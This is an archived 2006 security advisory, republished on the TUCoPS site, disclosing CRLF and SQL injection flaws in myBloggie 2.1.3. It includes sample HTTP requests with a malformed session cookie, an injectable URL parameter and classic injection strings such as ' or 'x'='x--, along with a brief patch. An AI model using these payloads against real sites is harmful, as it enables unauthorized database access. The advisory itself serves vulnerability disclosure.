Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Blogs :: b06-2275.htm

myBloggie 2.1.3 CRLF & SQL Injection



HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection
HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection



------------------------------------------------------=0D
      HYSA-2006-008 h4cky0u.org Advisory 017=0D
------------------------------------------------------=0D
Date - Wed May 17 2006=0D
=0D
=0D
TITLE:=0D
=======0D
=0D
myBloggie 2.1.3 CRLF & SQL Injection =0D
=0D
=0D
SEVERITY: =0D
========= =0D
=0D
Medium =0D
=0D
=0D
SOFTWARE: =0D
========= =0D
=0D
myBloggie 2.1.3 =0D
=0D
http://mybloggie.mywebland.com/ =0D 
=0D
=0D
INFO: =0D
===== =0D
=0D
myBloggie is considered one of the most simple, user-friendliest yet packed with features =0D
=0D
Weblog system available to date. =0D
=0D
=0D
DESCRIPTION: =0D
============ =0D
=0D
--==CRLF injection==-- =0D
=0D
GET /mybloggie/ HTTP/1.0 =0D
Accept: */* =0D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) =0D
Host: 127.0.0.1:80 =0D
Cookie: PHPSESSID=op0-11{}};q, or something like that =0D
Connection: Close =0D
=0D
GET /mybloggie/admin.php HTTP/1.0 =0D
Accept: */* =0D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) =0D
Host: 127.0.0.1:80 =0D
Cookie: PHPSESSID=op0-11{}};q, or something like that =0D
Connection: Close =0D
=0D
GET /mybloggie/index.php HTTP/1.0 =0D
Accept: */* =0D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) =0D
Host: 127.0.0.1:80 =0D
Cookie: PHPSESSID=op0-11{}};q, or something like that =0D
Connection: Close =0D
=0D
--==SQL injection==-- =0D
=0D
http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id=' =0D 
=0D
Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept: =0D
=0D
1' having '1'='1'-- =0D
=0D
or =0D
=0D
' or 'x'='x-- =0D
=0D
And a little patch from me: =0D
=0D
if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){ =0D
    echo "Invalid Characters"; =0D
    exit; =0D
    } =0D
    =0D
if (isset($_GET['select'])) $select=$_GET['select']; =0D
if (isset($_POST['keyword'])) $keyword=$_POST['keyword']; =0D
=0D
=0D
$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword); =0D
//.... =0D
  =0D
=0D
VENDOR STATUS: =0D
============== =0D
=0D
Vendor was contacted but no response received till date. =0D
=0D
=0D
CREDITS: =0D
======== =0D
=0D
This vulnerability was discovered and researched by =0D
matrix_killer of  h4cky0u Security Forums. =0D
=0D
mail : matrix_k at abv.bg =0D
=0D
web : http://www.h4cky0u.org =0D 
=0D
=0D
Search function sql injection was discovered by:  MurderSkillz=0D
=0D
=0D
Co-Researcher:=0D
 =0D
h4cky0u of h4cky0u Security Forums. =0D
=0D
mail : h4cky0u at gmail.com =0D
=0D
web : http://www.h4cky0u.org =0D 
=0D
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!=0D
=0D
=0D
ORIGINAL ADVISORY:=0D
===================0D
=0D
http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH